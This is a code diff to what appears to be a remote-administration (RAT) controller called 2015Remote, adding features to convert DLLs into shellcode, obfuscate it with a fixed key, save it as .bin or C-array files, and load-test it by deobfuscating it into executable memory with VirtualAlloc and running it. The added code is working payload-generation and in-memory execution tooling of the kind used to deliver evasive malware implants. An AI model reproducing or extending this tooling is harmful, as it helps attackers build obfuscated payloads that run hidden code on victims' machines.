diff --git a/common/obfs.h b/common/obfs.h
index 43b2d8f..916bd84 100644
--- a/common/obfs.h
+++ b/common/obfs.h
@@ -7,12 +7,20 @@
 
 class ObfsBase {
 public:
+	bool m_bGenCArray;
+	ObfsBase(bool genCArray = true) : m_bGenCArray(genCArray) { }
+	virtual ~ObfsBase() { }
+
 	// ¶Ô³Æ»ìÏýº¯Êý£ºÓÃÓÚ¼ÓÃÜºÍ½âÃÜ
 	virtual void ObfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {}
 
 	// ½â»ìÏý£ºÓë¼ÓÃÜË³ÐòÏà·´
 	virtual void DeobfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {}
 
+	virtual bool WriteFile(const char* filename, uint8_t* data, size_t length, const char* arrayName) {
+		return m_bGenCArray ? WriteBinaryAsCArray(filename, data, length, arrayName) : WriteBinaryFile(filename, data, length);
+	}
+
 	// ½«¶þ½øÖÆÊý¾ÝÒÔ C Êý×é¸ñÊ½Ð´ÈëÎÄ¼þ
 	virtual bool WriteBinaryAsCArray(const char* filename, uint8_t* data, size_t length, const char* arrayName) {
 		FILE* file = fopen(filename, "w");
@@ -32,6 +40,17 @@ public:
 		fclose(file);
 		return true;
 	}
+
+	// Ê¹ÓÃ "wb" ¶þ½øÖÆÐ´ÈëÄ£Ê½
+	virtual bool WriteBinaryFile(const char* filename, const uint8_t* data, size_t length) {
+		FILE* file = fopen(filename, "wb");
+		if (!file) return false;
+
+		size_t written = fwrite(data, 1, length, file);
+		fclose(file);
+
+		return written == length;
+	}
 };
 
 class Obfs : public ObfsBase {
@@ -47,6 +66,8 @@ private:
 	}
 
 public:
+	Obfs(bool genCArray = true) : ObfsBase(genCArray) { }
+
 	// ¶Ô³Æ»ìÏýº¯Êý£ºÓÃÓÚ¼ÓÃÜºÍ½âÃÜ
 	virtual void ObfuscateBuffer(uint8_t* buf, size_t len, uint32_t seed) {
 		uint32_t state = seed;
diff --git a/server/2015Remote/2015Remote.rc b/server/2015Remote/2015Remote.rc
index afabec7..85203d0 100644
Binary files a/server/2015Remote/2015Remote.rc and b/server/2015Remote/2015Remote.rc differ
diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index b572532..e57608d 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -497,6 +497,10 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
     ON_COMMAND(ID_MACHINE_LOGOUT, &CMy2015RemoteDlg::OnMachineLogout)
     ON_WM_DESTROY()
     ON_MESSAGE(WM_SESSION_ACTIVATED, &CMy2015RemoteDlg::OnSessionActivatedMsg)
+    ON_COMMAND(ID_TOOL_GEN_SHELLCODE_BIN, &CMy2015RemoteDlg::OnToolGenShellcodeBin)
+    ON_COMMAND(ID_SHELLCODE_LOAD_TEST, &CMy2015RemoteDlg::OnShellcodeLoadTest)
+    ON_COMMAND(ID_SHELLCODE_OBFS_LOAD_TEST, &CMy2015RemoteDlg::OnShellcodeObfsLoadTest)
+    ON_COMMAND(ID_OBFS_SHELLCODE_BIN, &CMy2015RemoteDlg::OnObfsShellcodeBin)
 END_MESSAGE_MAP()
 
 
@@ -3153,6 +3157,17 @@ void CMy2015RemoteDlg::OnToolInputPassword()
     }
 }
 
+bool safe_exec(void *exec) {
+	__try {
+		((void(*)())exec)();
+        return true;
+	}
+	__except (EXCEPTION_EXECUTE_HANDLER) {
+		VirtualFree(exec, 0, MEM_RELEASE);
+	}
+    return false;
+}
+
 /* Example: <Select TinyRun.dll to build "tinyrun.c">
 #include "tinyrun.c"
 #include <windows.h>
@@ -3169,9 +3184,9 @@ int main() {
 }
 */
 #include "common/obfs.h"
-void shellcode_process(ObfsBase *obfs) {
-	CFileDialog fileDlg(TRUE, _T("dll"), NULL, OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT,
-		_T("DLL Files (*.dll)|*.dll|All Files (*.*)|*.*||"), AfxGetMainWnd());
+void shellcode_process(ObfsBase *obfs, bool load = false, const char* suffix = ".c") {
+	CFileDialog fileDlg(TRUE, NULL, NULL, OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT,
+		_T("DLL Files (*.dll)|*.dll|BIN Files (*.bin)|*.bin|All Files (*.*)|*.*||"), AfxGetMainWnd());
 	int ret = 0;
 	try {
 		ret = fileDlg.DoModal();
@@ -3195,15 +3210,28 @@ void shellcode_process(ObfsBase *obfs) {
 
 		LPBYTE srcData = NULL;
 		int srcLen = 0;
-		if (MakeShellcode(srcData, srcLen, (LPBYTE)szBuffer, dwFileSize)) {
+        if (load){
+            const uint32_t key = 0xDEADBEEF;
+            obfs->DeobfuscateBuffer(szBuffer, dwFileSize, key);
+			void* exec = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+			if (exec) {
+				memcpy(exec, szBuffer, dwFileSize);
+				if (safe_exec(exec)) {
+					AfxMessageBox("Shellcode æ‰§è¡ŒæˆåŠŸ! ", MB_ICONINFORMATION);
+                }
+                else {
+                    AfxMessageBox("Shellcode æ‰§è¡Œå¤±è´¥! è¯·ç”¨æœ¬ç¨‹åºç”Ÿæˆçš„ bin æ–‡ä»¶è¿›è¡Œæµ‹è¯•! ", MB_ICONERROR);
+                }
+			}
+        }
+		else if (MakeShellcode(srcData, srcLen, (LPBYTE)szBuffer, dwFileSize)) {
 			TCHAR buffer[MAX_PATH];
 			_tcscpy_s(buffer, name);
 			PathRemoveExtension(buffer);
             const uint32_t key = 0xDEADBEEF;
-            const BYTE* p = srcData;
             obfs->ObfuscateBuffer(srcData, srcLen, key);
-			if (obfs->WriteBinaryAsCArray(CString(buffer) + ".c", srcData, srcLen, "Shellcode")) {
-				AfxMessageBox("Shellcode ç”ŸæˆæˆåŠŸ! è¯·è‡ªè¡Œç¼–å†™è°ƒç”¨ç¨‹åºã€‚\r\n" + CString(buffer) + ".c",
+			if (obfs->WriteFile(CString(buffer) + suffix, srcData, srcLen, "Shellcode")) {
+				AfxMessageBox("Shellcode ç”ŸæˆæˆåŠŸ! è¯·è‡ªè¡Œç¼–å†™è°ƒç”¨ç¨‹åºã€‚\r\n" + CString(buffer) + suffix,
 					MB_ICONINFORMATION);
 			}
 		}
@@ -3225,6 +3253,40 @@ void CMy2015RemoteDlg::OnObfsShellcode()
 }
 
 
+void CMy2015RemoteDlg::OnToolGenShellcodeBin()
+{
+	ObfsBase obfs(false);
+	shellcode_process(&obfs, false, ".bin");
+}
+
+void CMy2015RemoteDlg::OnObfsShellcodeBin()
+{
+	Obfs obfs(false);
+	shellcode_process(&obfs, false,  ".bin");
+}
+
+
+void CMy2015RemoteDlg::OnShellcodeLoadTest()
+{
+    if (MessageBox(CString("æ˜¯å¦æµ‹è¯• ") + (sizeof(void*) == 8 ? "64ä½" : "32ä½") + " Shellcode äºŒè¿›åˆ¶æ–‡ä»¶? "
+        "è¯·é€‰æ‹©å—ä¿¡ä»»çš„ bin æ–‡ä»¶ã€‚\r\næµ‹è¯•æœªçŸ¥æ¥æºçš„ Shellcode å¯èƒ½å¯¼è‡´ç¨‹åºå´©æºƒï¼Œç”šè‡³å­˜åœ¨ CC é£Žé™©ã€‚", 
+        "æç¤º", MB_ICONQUESTION | MB_YESNO) == IDYES) {
+		ObfsBase obfs;
+		shellcode_process(&obfs, true);
+    }
+}
+
+
+void CMy2015RemoteDlg::OnShellcodeObfsLoadTest()
+{
+	if (MessageBox(CString("æ˜¯å¦æµ‹è¯• ") + (sizeof(void*) == 8 ? "64ä½" : "32ä½") + " Shellcode äºŒè¿›åˆ¶æ–‡ä»¶? "
+        "è¯·é€‰æ‹©å—ä¿¡ä»»çš„ bin æ–‡ä»¶ã€‚\r\næµ‹è¯•æœªçŸ¥æ¥æºçš„ Shellcode å¯èƒ½å¯¼è‡´ç¨‹åºå´©æºƒï¼Œç”šè‡³å­˜åœ¨ CC é£Žé™©ã€‚",
+		"æç¤º", MB_ICONQUESTION | MB_YESNO) == IDYES) {
+		Obfs obfs;
+		shellcode_process(&obfs, true);
+	}
+}
+
 void CMy2015RemoteDlg::OnOnlineAssignTo()
 {
     CInputDialog dlg(this);
diff --git a/server/2015Remote/2015RemoteDlg.h b/server/2015Remote/2015RemoteDlg.h
index ed3df64..33a3dee 100644
--- a/server/2015Remote/2015RemoteDlg.h
+++ b/server/2015Remote/2015RemoteDlg.h
@@ -340,4 +340,8 @@ public:
     afx_msg void OnMachineLogout();
     void MachineManage(MachineCommand type);
     afx_msg void OnDestroy();
+    afx_msg void OnToolGenShellcodeBin();
+    afx_msg void OnShellcodeLoadTest();
+    afx_msg void OnShellcodeObfsLoadTest();
+    afx_msg void OnObfsShellcodeBin();
 };
diff --git a/server/2015Remote/resource.h b/server/2015Remote/resource.h
index 6149df6..b305a6d 100644
Binary files a/server/2015Remote/resource.h and b/server/2015Remote/resource.h differ
